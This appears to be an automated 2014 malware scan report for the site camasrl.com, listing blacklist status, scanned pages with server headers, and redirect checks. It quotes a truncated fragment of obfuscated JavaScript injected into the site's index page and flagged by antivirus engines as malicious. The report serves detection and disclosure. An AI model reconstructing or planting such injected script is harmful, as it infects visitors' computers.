Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=camasrl.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://camasrl.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://camasrl.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:03:25 GMT Location: http://www.camasrl.com/ Server: Apache Content-Length: 231 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.camasrl.com/ | HTTP/1.1 200 OK Date: Sat, 20 Sep 2014 17:03:26 GMT Accept-Ranges: bytes ETag: "90ebf5eb81a1c81:49bc2b" Server: Microsoft-IIS/6.0 Content-Length: 4466 Content-Location: http://www.camasrl.com/index.html Content-Type: text/html Last-Modified: Fri, 18 Apr 2008 18:27:56 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.camasrl.com/index.html | 200 OK Content-Length: 4466 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ohuzw="%";wndic="<scrip&74 lan&67u&61g&65&3dj&61vasc&72&69&70t> &20fu&6ecti&6fn zt&68&62o(x){va&72&20&7a,k&3d\"&73N[M{&35g&32eo]J&20&75\\\"&43+&5e&3b&55&749@&5fOH&29&2eTw&2cf&26=7A&696!}&70&71&2d&6c&46*a3&4b0c&49&38&78#&27&50m`&68yB1&76(&5a&62&24&72&45n&6a&6b&34G~&7c&am Antivirus reports:
| ||
http://www.camasrl.com/56k/home.html | 200 OK Content-Length: 8449 Content-Type: text/html | clean |
http://www.camasrl.com/56k/azienda.html | 200 OK Content-Length: 7527 Content-Type: text/html | clean |
http://www.camasrl.com/56k/macchinari.html | 200 OK Content-Length: 7207 Content-Type: text/html | clean |
http://www.camasrl.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://www.camasrl.com/56k/contatti.html | 200 OK Content-Length: 8573 Content-Type: text/html | clean |
http://www.camasrl.com/56k/video.html | 200 OK Content-Length: 7517 Content-Type: text/html | clean |
http://www.camasrl.com/56k/../video/CAMAWEB_300x169.mov | 200 OK Content-Length: 300760 Content-Type: video/quicktime | clean |
http://camasrl.com/english/56K/home_uk.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 20 Sep 2014 17:03:29 GMT Location: http://www.camasrl.com/english/56K/home_uk.html Server: Apache Content-Length: 255 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.camasrl.com/english/56k/home_uk.html | 200 OK Content-Length: 10379 Content-Type: text/html | clean |
http://www.camasrl.com/english/56k/company.html | 200 OK Content-Length: 9416 Content-Type: text/html | clean |
http://www.camasrl.com/english/56k/../../56k/azienda.html | 200 OK Content-Length: 7527 Content-Type: text/html | clean |
http://www.camasrl.com/english/56k/../../56k/macchinari.html | 200 OK Content-Length: 7207 Content-Type: text/html | clean |
http://www.camasrl.com/english/56k/../../56k/home.html | 200 OK Content-Length: 8449 Content-Type: text/html | clean |
http://www.camasrl.com/english/56k/../../56k/contatti.html | 200 OK Content-Length: 8573 Content-Type: text/html | clean |
http://www.camasrl.com/english/56k/../../56k/video.html | 200 OK Content-Length: 7517 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: camasrl.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 20 Sep 2014 17:03:25 GMT
Location: http://www.camasrl.com/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
GET / HTTP/1.1
Host: camasrl.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 20 Sep 2014 17:03:25 GMT
Location: http://www.camasrl.com/
Server: Apache
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
...231 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: camasrl.com
Referer: http://www.google.com/search?q=camasrl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: camasrl.com
Referer: http://www.google.com/search?q=camasrl.com
Result:
The result is similar to the first query. There are no suspicious redirects found.